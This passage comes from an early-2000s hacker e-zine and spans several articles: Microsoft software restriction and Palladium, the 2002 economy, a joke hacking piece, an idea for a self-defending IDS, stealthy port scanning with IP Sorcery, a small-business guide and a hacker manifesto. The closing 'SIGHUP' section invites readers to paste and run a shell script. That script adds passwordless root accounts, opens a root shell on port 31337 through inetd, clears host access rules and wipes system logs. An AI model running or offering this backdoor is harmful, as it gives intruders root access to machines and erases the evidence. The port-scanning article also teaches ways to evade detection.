the MD-5 signature. A company can change the certificate identifying the software by changing the MD-5. The path rule may generate registry settings. The zone rule simply identifies where internet explorer downloaded the file from, whether it is the internet, intranet, trusted zone, restricted site, or my computer. Microsoft claims the zone rule only applies to the MSI packages. In XP, the Group Policy Object (GPO), as we see it here, can be skipped by using the WMI. "For example, you can create a WMI filter so that a GPO only applies to machines with a certain service pack (John Lambert, Microsoft Corporation)." Microsoft further states: It is possible to use software restriction policies in a mixed-mode deployment. That is, you do not have to upgrade your Windows 2000 domain controllers to take advantage of software restriction policies. You can use a Windows XP Professional computer to edit the Group Policy object and configure your software restriction policy. Windows XP and Windows .NET Server machines that download the GPO will enforce the software restriction policy. Computers running Windows 2000 will ignore the settings. (John Lambert, Microsoft Corporation). Microsoft's project "Palladium" will expand on these ideas of restricting software. There is a business overview white paper of the project at http://www.microsoft.com/PressPass/features/2002/jul02/0724palladiumwp.a sp. John Manferdelli, General Manager, Microsoft "Palladium" Business Unit, states: Palladium will greatly reduce the risk of many viruses and spyware -- software that captures and reports information from inside your PC -- and other attacks. Memory in Palladium PCs and other devices will run only "trusted" code that is physically isolated, protected, and inaccessible to the rest of the system. Files within the Palladium architecture will be encrypted with secret coding specific to each PC, making them useless if stolen or surreptitiously copied. (http://www.microsoft.com/presspass/features/2002/jul02/07-01palladium.a sp). Manferdelli further claims that the industry is excited about Palladium. He admits that Microsoft is still a long way from Palladium. The alternative may be open source software. But, can open source seriously compete with this hegemony? Alexandra Krasne seems to think it might a different potential(http://www.nwfusion.com/news/2000/0302msoffice.html). And Microsoft is reportedly trying to merge .Net with the competitor Apache Server. "Software titan Microsoft is taking a significant step toward appeasing the open source community by integrating its .NET Framework into the Apache Web server, the world's most popular back-end software for serving up Web pages (Linux Today, Jul 24, 2002)." But one must wonder just how far off Big Brother really is... Credits John Lambert, Microsoft Corporation Using Software Restriction Policies in Windows XP and Windows .NET Server to Protect Against Unauthorized Software Published: January 2002 Linux Today http://linuxtoday.com/news_story.php3?ltsn=2002-07-24-017-26-NW-MS-SV Microsoft Linux: forecast or fantasy? Despite its denials, Microsoft may not overlook the potential of Linux. http://www.nwfusion.com/news/2000/0302msoffice.html Microsoft "Palladium": A Business Overview Combining Microsoft Windows Features, Personal Computing Hardware, and Software Applications for Greater Security, Personal Privacy and System Integrity http://www.microsoft.com/PressPass/features/2002/jul02/0724palladiumwp.asp Q&A: Microsoft Seeks Industry-Wide Collaboration for "Palladium" Initiative http://www.microsoft.com/presspass/features/2002/jul02/07-01palladium.asp -------------------------------------------------------------------------------- [The Escalation to Economic Turmoil]==========[OverDose ] -------------------------------------------------------------------------------- This article will briefly cover what's going on in American economy and the repurcussions from past actions by individuals. It all started one bright September 11th in 2001, then it happened.... terrorist attack on a few of american governmental and economic icons, being the World Trade Center and the Pentagon. The following week the Dow fell over 200 points, a massive hit to the exchanges. After this hit, financial records were scrutinized of Enron (an energy supplier) and Arthur Anderson (one of the"Big 5" accounting firms)'s aid in the deception. We all know that there was augmentation of financial records and upon the scouring of which, a lot of executives came under fire. One of which, Clifford Baxter, a former vice chairman for Enron committed suicide to evade legal effects. These were two major disasters affecting the economy. Alan Greenspan, Chairman Board of Governors of the Federal Reserve System, is a direct influence of how investors feel about the current status of America's economy. When he speaks, people listen. He introduced a few interest rate cuts to help stimulate the economy... which worked to a certain degree. Then we have allegations that officials from Enron *AND* Arthur Anderson destroying financial records, and a few indiscriminants being held accountable for obstruction of justice for doing so. After all is said and done, there is a bit of stability in the exchange and regular trading is sustained. After all what happened with Enron, many other companies are scrutinized for their financial records, as many of them inflated figures to make their quarterly earnings to be much higher or their debts to other entities much lower than they really are to make themselves look better off to investors so they would generate capital from these outside investors. Now here we are post mid-year 2002 and things are getting worse. With so many companies augmenting financial figures, there is great uncertainty among investors, dropping the dow lower than the hit from September 11th. It can be a viscious cycle: the dow drops and incites a panic in the market and people sell all they have due to fear of losing all they have, and from these drops other are even more fearful and begin selling. President George W. Bush was stated as selling stock in Harken Energy as an inside trade, since he was head of the board,yet he didn't. He claims he filed the form with the SEC( Security and Exchange Comittee) and that they had lost the form, then when questioned about it later stated that it was Harken's lawyers that were to blame. This coming soon after poor corporate reform to disallow any mishaps of changing financial information and creating ethical ENFORCABLE standards. All of these things are bleeding the trust of investors and are being felt on wall street and all around the world, as the Dow drops bit by bit. This is just the tip of the iceberg, but I beleive a good enough synopses to understand what exactly is affecting trading and inherently affecting the economy of the USA and indirectly the world. If you want to read about other things that Pres Bush has done go to http://www.wage-slave.org/scorecard.html If you have any questions or comments about this article please email me at overdose@legions.org -------------------------------------------------------------------------------- [How To Hack your Way Out Of A Paper Box]==========[Kiddish ] -------------------------------------------------------------------------------- Title: How To Hack your Way Out Of A Paper Box 4 R33t0ddz Contents: I. Introduction II. The Box 1. Structure & Layout 2. Tools of the Trade 3. Exploiting III. Hanky Panky 1. You Put you Right foot out 2. And you shake it all about ... 3. Conclusion 4. Shouts, Insults & Enemies !@#$ I.Introduction Greetings everyone, welcome to my very first article of "4 R33t0ddz" for Legions. This article was developed for personal reasons I would like to explain here. IRC Is a place where people can communicate with each other over the net in a single room. There are lamers among us who act like idiots and think there elite hackers. This goes out to all the lamers out there who have been flamed at by others because you can't hack your way out of a paper box. Well this is for you to get back at them :D~ II.The Box In order to hack the box and show all your elite friends or others that you are elite too, you must have a map of the box inside, the tools and ways to us them to be free. 1. Structure & Layout First analyze the box from the inside (since you are inside already). Look at its hieght, its widthm its dimensions and every corner of the box to get an understanding of the structure & layout of this box's fingerprints. There are different boxes out there, from corbord box to wooden box. 2. Tools of the Trade Now we have a concept of the box's structure & layout. We need to use the right tools to crack open the box. First and foremost, you need a pocket lights so you can see what your doing obviously :P . Second we need an axe to hack your way out. Third we need porn magazines (since we are going to stay a while inside, just something to have "fun" while you rest) . Lastly the last tool we need (which is an exception for most ) is a geometric ruler to cut the right size or you could use your fingers or any other parts of your body. 3. Exploiting Yey we got the tools now we need to learn how to use them. Turn on that pocket lights or flash lights (whatever you wanna call it, this is 4 R33t0ddz) and hold it with your left hand to have an angle of where your "hacking". Get that geo-ruler out or your fingers and start doodling. Now take that time to rest a bit and take out that porn magazine I told you to bring and jizz like you never jizzed before (You are half way there :P~) . Once you have layed out yout diagram on the wall box start hacking !@# Get that axe out and hack away, hack every side, every width and every hieght you made with doodle. III. Hanky Panky 1. You Put your Right foot out (I can't explain that enough 4 R33t0ddz) 2. And you shake it all about You must shake it all about because you where all crippled inside the box and you need the blood to circulate all around your body :) 3. Conclusion I hope you have learned something today, because if you haven't that's still ok your very very very special little boy/girl :) . Your friends, enemies and elite hackers out there will think your real cool and all and when they say "you can't hack your way out of a paper box" you can tell them "I read "How To Hack your Way Out Of A Paper Box 4 R33t0ddz" " :) . Make sure you tell them it's 4 R33t0ddz so they will think your very very very special boy/girl and they will fear you ;) . 4. Shouts, Insults & Enemies !@#$ Shouts go out to everyone on #legions & #isecurity Insults go out to 4 r33t0ddz fans :] Enemies go out to all the bullies out there ... :P~ -------------------------------------------------------------------------------- [Delirious IDS]==============================[Digital Ebola ] -------------------------------------------------------------------------------- Okay. This is part technical paper, part rant, and part silliness. I am very very tired. Please forgive me if I get loopy. I came home today, and decide to start kludging together a host based IDS script. One part tripwire, one part common sense, and one part crazyness. I am obviously expecting a attack on one of my boxen at his moment, and because of all the craziness going on with the OpenBSD project as of late, I feel that my paranoia is appropiate. Granted, I will save that discussion for another rant, but let's just say, I am not at all pleased with what is one of my most favorite operating systems. I don't like OpenBSD for its "security model"; I like it because its compact and runs well on Sparc architecture.. Again, that is another rant. I have lost faith. As I worked on this mythical IDS script, my thoughts began to wonder to kernel trojans, and to Tim Lawless's Saint Jude project. So, I got a flash of inspiration (or insanity).. and I am not sure if this is quite a original thought, if it already exists, or anything. I want to see a host based IDS built of a artifical intelligence type model. What I mean by that, I want a HID that is intelligent enough to not only check MD5 sums on certain things, file sizes on other things, AND presence of certain files, but I also want the thing to defend itself if a breach occurs. Imagine this: Joe Hax0r Kiddy breaks into your box via a user account. (Damn users!, *sigh, another rant) Now Joe is working on his root transition. Well, we can detect this. Just ask Lawless. Now, imagine the HID fighting back. Joe gains root, and starts replacing files. The HID logs into another machine and copies backups into place - ON THE FLY. This is going to gain us several advantages. First, we have a record of the intrusion on a offsite machine. Second, Joe Hax0r Kiddy thinks that he has successfully backdoored the machine. He may just leave the system with that impression. Third, if this pans out correctly, no future attackers can penetrate the machine after Joe leaves. In essence, the HID is protecting the machine proactively in real time. Something a IDS is generally not supposed to be able to do. A list of features would be as follows: 1. Joe loads a kernel module. HID unloads it. (Time delay?) 2. Joe replaces files. HID replaces files from known good backup (off site) 3. Joe pounds at machine. HID calls for help. (pager, cellphone) 4. Worst case scenario - HID realizes with some unknown logic that it cannot cope with Joe Hax0r Kiddy. HID decides to call for help, and shut itself down. 5. Email to all users on the system that data integrity has been lost. 6. HID detects the method of root compromise and searches for a patch on its own. Once it finds a patch, it downloads it and installs it. (CVS?) 7. HID tracks Joe's IP of origin (IP registry, nslookup, traceroute, domain information) and mails a off-site email this information. The main issues here at present would be making this software totally stealth. Also, we would want to be 100% sure that events are not false, prompting a crazy HAL-like HID... I believe this last point is quite possible with host-based intrusion. Also, there are several obvious ways to defeat the HID: 1. Know that is is present and unload it. Perhaps have a second module to call for help when this happens? 2. Unknown kernel rootkits. 3. Off-site backup is unreachable. 4. Total loss of network connectivity. I think that what I am describing is possible. Hell, it might already exist. I have not slept in a long time, and maybe this is causing a effect on me. This paper is to provoke discussion, and happy engineering. Look for a more technical paper in next KV.. (I hope theres a next KV) -------------------------------------------------------------------------------- [Custom TCP Port Scanning using IP Sorcery]==========[Case ] -------------------------------------------------------------------------------- Custom TCP Port Scanning using IP Sorcery By Phriction aka Case (phric@legions.org) Ingredients ----- IP Sorcery http://www.legions.org/~phric/ipsorcery.html http://www.freshmeat.net/ipsorcery Paul Oakenfold of course Also maybe tcpdump we will see.. http://www.tcpdump.org ----- I think the weakness most port scans have today is the ability to intertwine with regular traffic. They leave huge fingerprints because of their packet values. For Example: # nmap -sS -p19 -P0 127.0.0.1 -D192.168.0.8 ----- tcpdump output ----- 00:21:52.770558 localhost.61534 > localhost.chargen: S [tcp sum ok] 1000758013:1000758013(0) win 1024 (ttl 44, id 41523, len 40) 0x0000 4500 0028 a233 0000 2c06 ee9a 7f00 0001 E..(.3..,....... 0x0010 7f00 0001 f05e 0013 3ba6 5afd 0000 0000 .....^..;.Z..... 0x0020 5002 0400 26cb 0000 P...&... 00:21:52.772240 192.168.0.8.61534 > localhost.chargen: S [tcp sum ok] 1000758013:1000758013(0) win 1024 (ttl 44, id 9057, len 40) 0x0000 4500 0028 2361 0000 2c06 2bbe c0a8 0008 E..(#a..,.+..... 0x0010 7f00 0001 f05e 0013 3ba6 5afd 0000 0000 .....^..;.Z..... 0x0020 5002 0400 e51b 0000 P....... ----- As you might have noticed my decoy could be easily noticed, both packets sent have the same sequence number same window size, same ttl. Neither have a Don't Fragment bit set. Try it yourself the decoys always send the same data as the normal host. Don't get me wrong nmap is a great scanner and definitely a great use for quick port scans. I personally think a great job was done on it but use it wisely young padowin learner. IP Sorcery is shamelessly promoted in this article please forgive me ;) IP Sorcery is a commandline or GTK packet generator. The console version has built in sniffing well in the development version the GTK version will also have this ability relatively soon as I continue to hack code amongst other endeavours. OK lets test this baby out. #./ipmagic -is 192.168.0.10 -id www.legions.org -io D -td 22 Received TCP Packet: Src Port: 22 Dst Port: 1920 Flags: SYN ACK ---- Oh Happy day the port is open. it is you say, ow can you tell... break; From IP Sorcery README TCP-- Usually when you send a SYN packet to an open port it will send a SYN ACK back to you if it's open, a RST ACK if it's closed When you send a SYN FIN it will usually send a SYN ACK back if it's open, or a RST ACK if it's closed. SYN PSH will send a SYN ACK back if it's open, a RST ACK if it's closed FIN will send back a RST ACK if it's closed PSH will send nothing if it's open or RST ACK if it's closed ACK will usually get a RST back no matter if it's open or closed No flags will return nothing if it's open, or a RST ACK if it's closed Now this is if there is no firewall or ipchains or anything of that nature running. Usually you can tell if a port is denying access if there is no response to any packets you send at all ---- Ok back to the game, now since we know the basics lets see what this thing can do. #for i in 21 22 23 do ./ipmagic -td $i >> scan; done #fgrep "SYN ACK" -B 1 scan Src Port: 22 Dst Port: 1940 Flags: SYN ACK -- Src Port: 23 Dst Port: 2251 Flags: SYN ACK ---- Wow simple easy as that and we see we have two open ports. IP Sorcery does random generation of values for each packet or you can specify them yourself the GTK interface is beautiful for doing that. You can also specify data payload and other things make the traffic look lively. If 4 guys wearing all black trench coats and black sun glasses walk into some place people will notice but guys dressed different will be passed up. Anyway screw this article with prejudice blah blah IP Sorcery 1.7.9beta should be out in a week or so, so hold your panties -------------------------------------------------------------------------------- [Business for Dummies]======================[eDfGr33n ] -------------------------------------------------------------------------------- [Business for those with no interest in business] OR [How to Supplement Your Income by Manifesting Your Own Techinical Skill in a Positive Way] General Overview [Before Capital is Aquired (or put to use)] 1. - Skills Assesment 2. - Relating Your Skills to a Buisness Venture 3. - Creating a Mission Statement and Buisness Plan [Setting Your Plans in Motion] 4. - Obtaining Capital 5. - Obtaining a Fictitous Name License 6. - Obtaining a Resale Licence (optional) 7. - Obtaining a Buisness License 8. - Actual implementation of said plans. [Managment and Accounting/Record Keeping] 9. - Accounting Methods 10 - Record Keeping 11.- Taxation and Deductables 12.- Managing Your Finances [Preface] This is the first edition version of my guide to supplementing your income by way of a personal buisness. As of this version, this guide is geared towards those looking into Sole Propriatorships, or buisness run by one person in their entirity. This all in all is not exactly the most profitable way of running a buisness, but seeing that i have no buisness background at all this is where i chose to start my guide. Id like to note that none of these methods mentioned herein have been put to the grindstone by myself just yet so as far as I know, their not necessarily true to the real world. I am however working on a startup as an experimential project, to actually see whats 'really' required to own and run a buisness. I plan to update this guide on a regular basis with the evolution or de-evolution of my buisness, making note of my successes and failures etc to give you an idea of what it actually takes to be successful. Oh, and if it seems like im writing it for toddlers its because I am. This article is for anyone looking into starting a buisness. If you feel you have a decent understanding of the general overview (which im sure most of you do) feel free to skip around and whatnot. I just tried to include everything i could think of. Yup.. K im done. haha. Enjoy the read. eDfGr33n (a colossal asshole) [Before Capital is Aquired (or put to use)] (Skills Assessment) What gave me the idea of starting a personal buisness originally wasnt the prospect of financial gain really. It was an epiphanie i had while taking a huge shit a few days ago. It pertained to the idea that all one really needed to have a successful buisness was the ability to produce in such a way that was unique or semi-unique to possible consumers. Things that most people in their complacent lifestyles choose to outsourse as to avoid getting their hands dirty. Things that a decent amount of people in #Legions do for fun on a regular basis. So i just drew the logical conclusion and decided that if we have whats in demand, whats to stop us from taking advantage of what we know and make it work for us. Its a somewhat infantile discovery but still a valid one. Even if you dont plan to be self-employed for any long period of time it still makes sense to have a side buisness if just to have the ability to use it for its intangible benifits (ie. for your resume, for writeoffs etc). Ya, after contemplating the idea for a good many hours ive come to the conclusion that with all the give and take within the buisness itself, there is no real drawback to owning your own buisness as long as you have the time to keep up with the up keep. haha. But ya anyway lets start with the basics, or in other words, finding what interests you (which actually if you loiter in #Legions is a given but for the all inclusive purposes of this article will be just whatever). Heres a few questions I stole from one of the books in the bibliography. They help you identify your stronger intresets. The underlying use is relatively simple, er extremely simple. Get a handful of your current intrests and use them in place of said '$interest' rating each on a scale of one to ten, ten being your highest intrest. --------------------------------------------------------------------------------- Figure 1.1 Interest Assessment How interested are you in $interest? [1-10] How knowledgable are you in $interest at this point? [1-10] How much time would it take you to become an expert at $interest? [1-10] How many people would be willing to pay for your experteese in $interest.[1-10] ----------------------------------------------------------------------------- The usual choice is simple logicstics, the higher the resultant number the better the choice would seem. But if you feel that you really wanna do something your not quite knowledgeable about at the moment and feel the want to learn something new before deciding then ya.. self-explanatory. If you feel comfortable in your decision then its time to figure out what category of buisness your intrest falls into. (Relating Your Skills to a Buisness Venture) Buisness are typically cut into three relative areas, Manufacturing Buisnesses, Retail Buisnesses, and Service Buisnesses, all of which having their own respective advanatages and disadvantages. Manufacturing Buisnesses typically have the least competition and the highest profit margins, yet they have disgustingly large startup fees and costs associated with managment. Theres so much to account for when starting a manufacturing buisness that i honestly wouldnt recommend it unless you have enormous financial backing and previous experience. Both of which this article assumes your not in possession of, which leads us to the next logical choice, the Retail Buisness. Now the Retail Buisness usually specializes in resale stuff. Think Walmart and Target and 7-11 etc.. Buisnesses which function off the general consumer. These buisnesses are just fucking stupid, and i refuse to even discuss competing against retail giants. The only way a Retail Buisness could possibly become a worthwhile endevor is if you target either extremely small towns or environments where you dont go into direct competition with any of the above said giants, or if you offer goods that cannot be purchaced elsewhere which are in demand.. ie patented stuff etc etc.. So all in all that leaves us with only one real choice, the service buisness, the best choice in my oppinion. You need no real product to sell which means the costs associated with manufacturing your good is really not an issue at all. Start-up fees can vary from place to place but usually dont exceed $100.00 and all you need is a client base to begin making profits (which if you posess any tiny ammount of wit really shouldnt be a big deal). Its amazing that more people dont actually invest the time to create such buisnesses, when we talk of deductables in Section 3, accounting, you'll understand why to an even greater degree. But in any case ya, choose your poison and continue, im gonna try and incorporate the general assumption that you have chosen any of the three when writing the rest of the paper, so dont worry about my personal oppinion. Just trying to point ya in the right direction. Haha. (Creating a Mission Statement and Buisness Plan) Ok... so, so far we have an idea and a general outline of the type of buisness we'll be creating. What comes next is creating a plan of action. Something to show to possible future investors what your goals are and something to keep you on track with your plans. I really cant stress enough how imporatant it actually is to have a well composed Mission Statement/Buisness Plan. It helps for recognition later on, of wayfaring and sidetracking from your original goals. Mission Statements can be modified upon idea/epiphanie but make sure you know your sidetracking will prove benificial. Make sure you include in your mission statement assorted goals and desires for the success of your buisness. Know the paths you want to travel, and follow them as explicitly as you can. Mathmatics will determine your luck, so if your making any changes in your mission statement make sure they add up. It is said that risks make for the most successful of industry tycoons, but im gonna state right fucking now that RISK ALSO CREATES PAUPERS. So keep things as stable as possible and try to follow your buisness plan as to the best of your ability. Figure 1.2 shows the parts of a standardised buisness plan. --------------------------------------------------------------------------- Figure 1.2 Business Plans Executive Summary - Synopsis of all the other parts of your buisness plan, typically written last, but should be numerically first. Marketplace Analysis - The results of a study preformed to determine your target market, and that targets succeptability to accept your services/goods. Competitive Environment - A study to show whos in direct competition with your company at the time of its composition. Marketing Plan - No buisness can possibly succede w/o bringing in customers, so here's where you describe exactly how you plan to - inform your client base of your intentions and possibly recruit them as actual clients. Financial Statements - (assumptions) - Your assumptions are your general estimations for profits within a given time frame and the costs associated with aquiring those profits. - (cash flow) - The cash flow aspect of your Buisness Plan just shows where your money is going within a said period of time. - Usually done in monthly increments. This part of your plan can actually be included within your assumptions - but for reasons involving convention should actually be given its own place. Appendixes - This is where you place varied information regarding your buisness, possibly to keep full documentation of ideas - mentioned earlier in the buisness plan. Your appendixes are usually used for holding information that is either - too lengthy to be placed in the earlier sections, or have no real other place to be mentioned in the plan. -------------------------------------------------------------------------------- So ya.. use that table to actually compose your buisness plan and whatnot. Make sure your analysis is accurate or do i really even need to state that, it is your money after all. Haha.. but ya.. after you've comprised your buisness plan the next logical step, if everything seems peachy, is to possibly take a week or so to contemplate what your doing. Understand the responsibilitys your about to place on yourself, and make sure your ready to set your feet in the water. Once you feel you have a firm understanding of your own buisness plan and you feel ready to progress then by all means, progress. The next part of this guide is aimed at taking those internal clockworkings and turning them into actual mechanized gears. [Setting Your Plans Into Motion] (Obtaining Capital) There are quite a few ways to obtain capital when starting a buisness as you are probabaly aware of. You have loans, investors, your personal bank account, personal credit, stocks you can sell, donations, etc. Just remember that with borrowed capital, your ass is on the line. If things go awry you have no recourse except to deal with your losses and possibly lose personal equity. Using your own monetary resources is definately the path to larger profits, but is not something to be taken lightly. If you have the money and feel that if you lost the capital it wouldnt impact you heavily than its the way to go. If you'd rather not put your finances on the line then typically the general idea is to get someone else to do it for you. Investors are usually looking to actually put their asses on the line for you but a share of the buisness in the end, goes into their pockets. Take for example an investor who's willing to give you 10% of your reqired startup costs for 10% of all profits that go thru your company. Now in the case of a manufacturing buisness that might sound pretty good if your startup costs are somewhere around $10 million, i mean that kind of capital is hard to come by. But on the other hand if your startup costs are only $2,000 and your your investors are putting up $200 for a buisness that will make over $5,000 a month its ludacris to think that you'd be giving $500 back to your investor every month there after for his original investment of only $200. So ya, it really depends on your buisness and your situation, etc. (Obtaining a Fictious Name Licence) (Obtaining a Resale License) (Obtaining a Buisness License) For these next sections, due to their variations between U.S. States im gonna recommend you call SCORE. The acronym stands for Service Core of Retired Executives and actually is a government funded program. Your tax dollars at work, heh. But ya in any case they can direct you on how to obtain said licenses in your state, and will give you anything reqired to obtain them besides the actual fees associated with them, which also vary state to state. The number for contacting SCORES as of the writing of this paper is: 1-800-827-5722 Besides telling you where to obtain these licenses they also give general advice and are usually old decrepid bastards looking to just generally converse with anyone. This is because of the fact that their signifigant others usually have left them by this point on account of their analy rententive buisness practices. Ya, its worth a call. But ya anyway, once you have those three licences your pretty much a buisness in all respects, except for the fact that you have no actual buisness yet. The next section deals with actually dealing with your buisness when you actually get some and what you need to keep as far as record keeping goes and likewise what you can disgard. [Managment and Accounting/Record keeping] (Accounting Methods) Two systems of accounting are used for record-keeping purposes, cash basis and accrual basis. Which one will be best for your buisness depends on your sales volume, the legal form under which you operate, and whether you extend credit. In cash basis accounting, you do buisness and pay taxes according to your real time cash flow. Cash income begins as soon as you ring it up on the register or recieve it by check. Expenses are paid as they occur. Both income and expences are put on the books and charged to the period in which they are paid or recieved. You can also defer income to the following year as long as it isn't actually or constructively recieved by you in the present year. A check recieved by you in the present year but not cashed until the following year is still income to you for the present year. Therefore, if you want to shift income to the following year, you will either have to delay billing untill the following year or bill so late in the present year that a present-year payment is unlikely. If you want to accelerate expenses to the present year, you should pay those bills recieved and log them as the present year year's expenses. An expense charged to your credit card will count as an expense in the year it was charged and not when you pay the card company. On the other hand, with accrual basis accounting, income and expenses are charged to the period to which they should apply, regardless of whether money has been recieved. For instance, if you are a contractor using accural basis accounting and have done work for which you haven't been paid, you recognise all expenses incurred in connection with that contract during the period in which it was supposed to have been completely paid and expensed, regardless of whether you have been paid for it yet. Its a more logically structured approach to accounting and takes into consideration for estamatitive accounting, which really in the end saves you time. This is my preferred method but again, my oppinion is just that, my oppinion. Either method works so ya.. whatever. (Record Keeping) Double-entry bookkeeping is the preferred method of keeping buisness records. You would first enter transactions in a journal, then post monthly totals of the transactions to the appropriate ledger accounts. There are five categorigories of ledger accounts respectively being, Income, Expenses, Assets, Liability, and Net worth. Each of these seperate accounts contain the information corrosponding to the accounts themselves (ie. putting incoming transactions into income, and expenditures in expenses, etc etc). At the end of each fiscial year or accounting period, accounts are balanced and closed. The income and expense accounts are transferred to the income statement for use in the summary of revenue and expenses. Its extremely important that you have records for almost every transaction due to the possibility of audits of your businesses tax deductions etc. Getting caught with your pants down, although fun at times when with a female companion, can grow afully tiresome when your pants are actually around your fettered ankles and theres some fucking man beast named killer attacking you from behind with no escape from his ravishings. Dont i just paint a fucking lovely picture. ------------------------------------------------------------------------------- Figure 3.1 Records to keep 1. Sales Records 2. Cash Recipts 3. Cash disbursements 4. Accounts Receivable 5. Capital Equipment 6. Insurance 7. Payroll (*) You should also keep copies of all federal income tax returns. (*) -------------------------------------------------------------------------------- NOTE: The automation of the recording and preperation of such data is also a terrific boon to any business and within the next few months I will be developing some open source software possibly to preform said tasks if i cant find any already in the public domain. (Taxation and Deductables) As a buisness owner and employer, you will be responsile for collecting various state and federal taxes and remitting theses to the proper agencies. In addition, you will be required to pay certin taxes yourself. These are givens. As far as the actual taxes your required to pay to keep your butt killer free, they are as follows in Figure 3.2. -------------------------------------------------------------------------------- Figure 3.2 Taxation Income Taxes - If you have employees, its the actual ammount to withhold from their paychecks. Social Security (FICA) Tax - Percentages vary with the size and income of your buisness. State Payroll Taxes - Again, only applicable if you have employees. Sales Taxes - The sales tax is only applicable to sold goods in most cases, not sold services. -------------------------------------------------------------------------------- As a sole propriator of a buisness there is really no special taxes to pay besides those stated above. You apply for a federal ID number and your pretty much set. The income from such a buisness flows through the owner (ie you) into an individual tax return. Seeing how state taxes differ from place to place its usually a good idea to contact the IRS as to find out what taxes you need to pay explicitly, to avoid possible oversight. With all these taxes one might think that owning a buisness is a ludacris venture with only minimal profitability. This is the presupposition of an unweary mind. The main plus to owning a buisness besides the ability to make an income without having to hear shit from an asshole of a boss is the idea of TAX DEDUCTIONS. hah!.. You can in all actuallity write off damn near anything pertaining to your buisness. Planning a trip to vegas, use the company car for the trip and meet a client there. Deduct the cost of your lodgings as a buisness expense. Deduct the cost of dinner as a buisness expense (note: currently only 50% of entertainment expenses are deductable, the remaining 50% is not deductable but still, that 50% cheaper). Deduct everything pertaining to the buisness as a buisness expense. As long as you maintain proper documentation and the corresponding accounting you should have no problem easily getting back what you've paid for in taxes. Also because im short on time at the moment im not gonna cover depreciation but i highly recommend you look into it to take advantage of the maximum allowable deduction permitted by law. (Managing Finances) As far as managing your finances goes, theres really not much to be said except to make sure you dont flagrantly waste your resources. Invest whayt you can back into the buisness making more of your current situation. There will be time for flagrant spending later when your ultimately successful and overwhelmingly wealthy. So ya, dont go out and get the lease to own mercedes with your first monthly income. Take your time, and make sound wise investments they ultimately will all in all benifit only you in the end. (Conclusion) To conclude this first version id like to state that yes it is a rough overview of buisnesses in general and again i have no actual buisness background myself. But im taking steps even as i type to change that, to better myself and those i associate myself with by understanding standard buisness practices and the likes there in. And again.. i will be updating this guide with my experiences and such with any change or understanding. I wouldnt use this guide at the moment to start a buisness of your own. Im just trying to get your gears rotating, to possibly intrest you in buisness and get you to actually do your own homework. I plan to make this guide quite a bit more comprehensive in the near future and possibly include buisness software/templates to make this process a relatively painless process. Think of me as your own personal buisness Jesus, ill nail myself to a plank and let you reap the benifits. haha.. k.. i got shit to do. eDfGr33n (comments/remarks/hatemail go to: personalbuisnessjesus@hotmail.com) thx: The Legions fuck yous: All those who resist my tyranny. -------------------------------------------------------------------------------- [The New Hackers Manifesto]==================[Digital Ebola ] -------------------------------------------------------------------------------- /* I wrote this in the shower one morning. It's just how I felt. */ /* Digital Ebola */ Another one got busted today Not for what you would think I nod my head in silence, yet I am crying inside Another idea stolen Another idea lost Another advance defeated I stand in the mall and I see sheep The flock doesnt know, and the flock doesnt care I am not like you I want to know where something comes from I want to know how something works I watch the flock blindly consume what it doesnt understand My world is not like your world I scream out, but none of you will listen when I do something creative it gets stolen, or shoved aside You do not care You only care about the almighty dollar You will stop at nothing to preserve it I give you my ideas freely You give me the DMCA I give you information security You give me the Patriot Act I have been called every name in the book smartass, hacker, cracker, terrorist You give me a hat and a cliche This madness has to stop Information no longer wants to be free Information IS free No matter what you do to quench it you squash 1 idea and 1000 more ideas will take its place Why fight it? This is and has always been our world You fear what you do not understand You steal what you cannot dream Your lawyers fight until the end Your money flows to what you think is the problem But I am not the problem YOU are the problem. YOU are scared and you want control In our world, WE have the control We hold the ideas and we carry the keys In this digital world of mortals we walk as gods We will not back down You can fight us, you can jail us you can quote your DMCA to us You can force code off one site and it will be mirrored a million times This world is full of people like me Awkward, antisocial, rebellious For I am hacker, one that uses his mind for any idea Not your bought-out media's definition but something that you will never comprehend You will never control what we say or think You will never win against us all This is our new manifesto and while you may silence me You wont get us all. -------------------------------------------------------------------------------- [SIGHUP]============================================[Legions of the Underground] -------------------------------------------------------------------------------- Well, looks like another end of issue is upon us, and in parting from your attention spans, we would like to trojan your UNIX/Linux machine. Well, as you can see, the LoU is not quite as advanced as some of those groups out there that might actually provide some kind of extractor thingamajig... and then distro trojaned versions.. No.. We have always been dependent on the reader being smart enough to use cut and paste.. So, since we aren't quite as technical, we are going to depend on you, the reader, to be smart enough to run the script below. It's quite okay! Honest! It can't be any worse then any of the other trojaned zines out there, and well, we admit this is quite primitive, it is also quite effective! Give it a try! Hmmm.. Maybe this should be a EULA.... See you at Defcon X, we will be full of booze, and in your machines before you can say "Damn, you guys so fly, here's 50 bucks and my sister!" OS=`uname -s` if [ $OS != "Linux" -a $OS != "FreeBSD" ]; then exit 0 fi echo "#" > /etc/hosts.allow echo "#" > /etc/hosts.deny if [ $OS == "Linux" ]; then echo "unf::9998:9998:unf,,,:/tmp:/bin/bash" >> /etc/passwd echo "unf2::0:0:unf,,,:/tmp:/bin/bash" >> /etc/passwd echo "unf::0:99999:7:::" >> /etc/shadow echo "unf2::0:99999:7:::" >> /etc/shadow elif [ $OS == "FreeBSD" ]; then echo "unf::9998:9998::0:0:unf:/tmp:" >> /etc/master.passwd echo "unf2::0:0::0:0:unf2:/tmp:" >> /etc/master.passwd pwd_mkdb /etc/master.passwd fi ln /dev/null /tmp/.bash_history if [ $OS == "Linux" ]; then killall -9 inetd echo "31337 stream tcp nowait root /bin/bash -i" >> /etc/inetd.conf elif [ $OS == "FreeBSD" ]; then killall inetd echo "31337 stream tcp nowait root /bin/sh -i" >> /etc/inetd.conf fi `which inetd` cat /dev/null > /var/log/messages if [ $OS == "Linux" ]; then cat /dev/null > /var/log/syslog elif [ $OS == "FreeBSD" ]; then cat /dev/null > /var/log/userlog cat /dev/null > /var/log/security cat /dev/null > /var/log/lastlog fi cat /dev/null > /var/log/wtmp cat /dev/null > /root/.bash_history -------------------------------------------------------------------------------- S U B M I T T O K E E N V E R A C I T Y -------------------------------------------------------------------------------- NO! You do not have to be a member of Legions of the Underground to submit to KV. You can be a member of something else! Nobody is perfect! If you have a idea and would like to toss it out in the wind for general discussion, or maybe you are researching something and you just want feedback, KV is a great way to get your ideas out in the open. We at Legions of the Underground are not prejudice in any way shape or form, so even a AOLer's article may be published if it seems that it has clue. Or then again, maybe hell will freeze over! Anyones stuff maybe published, but we will never know if you don't submit! So get to writing. Because what you don't know can kill you! Legions of the Underground is a equal opportunity destroyer. -------------------------------------------------------------------------------- All submissions to: submit-kv@legions.org -------------------------------------------------------------------------------- IRC: Undernet #legions MUD: 